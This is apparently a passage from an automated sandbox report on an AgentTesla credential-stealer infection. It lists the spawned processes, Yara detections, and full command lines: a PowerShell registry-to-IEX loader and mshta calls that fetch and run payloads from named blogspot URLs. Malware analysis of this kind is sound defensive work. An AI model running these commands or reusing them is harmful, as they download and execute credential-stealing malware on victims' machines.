                                                                                                                                                                                                            MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.2370323670.0000000004854000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.2361625874.000000000461E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:47
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:taskkill /f /im EXCEL.exe
                                                                                                                                                                                                            Imagebase:0xffdb0000
                                                                                                                                                                                                            File size:112640 bytes
                                                                                                                                                                                                            MD5 hash:3722FA501DCB50AE42818F9034906891
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:48
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).meather)|IEX
                                                                                                                                                                                                            Imagebase:0x13fcb0000
                                                                                                                                                                                                            File size:473600 bytes
                                                                                                                                                                                                            MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:51
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                            Imagebase:0x12b0000
                                                                                                                                                                                                            File size:261944 bytes
                                                                                                                                                                                                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000002.2291584431.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000002.2295286876.00000000026F1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.2295286876.00000000026F1000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:54
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://backbones1234511a.blogspot.com/p/stback1.html'', 0 : window.close')
                                                                                                                                                                                                            Imagebase:0x13f4d0000
                                                                                                                                                                                                            File size:13824 bytes
                                                                                                                                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

General

Start time: 13:44:57
Start date: 13/01/2021
Path: C:\Windows\System32\mshta.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\mshta.exe' https://backbones1234511a.blogspot.com/p/stback1.html
Imagebase: 0x13f4d0000
File size: 13824 bytes
MD5 hash: 95828D670CFD3B16EE188168E083C3C5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 13:45:02
Start date: 13/01/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
Imagebase: 0x21ac0000
File size: 452608 bytes
MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000021.00000002.2354098697.0000000004834000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000021.00000002.2353771380.00000000045FE000.00000004.00000001.sdmp, Author: Joe Security

General

Start time: 13:45:02
Start date: 13/01/2021
Path: C:\Windows\System32\mshta.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://startthepartyup.blogspot.com/p/backbone14.html'', 0 : window.close')
Imagebase: 0x13f4d0000
File size: 13824 bytes
MD5 hash: 95828D670CFD3B16EE188168E083C3C5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 13:45:04
Start date: 13/01/2021
Path: C:\Windows\System32\mshta.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\mshta.exe' https://startthepartyup.blogspot.com/p/backbone14.html
Imagebase: 0x13f4d0000
File size: 13824 bytes
MD5 hash: 95828D670CFD3B16EE188168E083C3C5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 13:45:10
Start date: 13/01/2021
Path: C:\Windows\System32\mshta.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://ghostbackbone123.blogspot.com/p/ghostbackup13.html'', 0 : window.close')
Imagebase: 0x13f4d0000
File size: 13824 bytes
MD5 hash: 95828D670CFD3B16EE188168E083C3C5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 13:45:12
Start date: 13/01/2021
Path: C:\Windows\System32\mshta.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\mshta.exe' https://ghostbackbone123.blogspot.com/p/ghostbackup13.html
Imagebase: 0x13f4d0000
File size: 13824 bytes
MD5 hash: 95828D670CFD3B16EE188168E083C3C5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Disassembly

Code Analysis
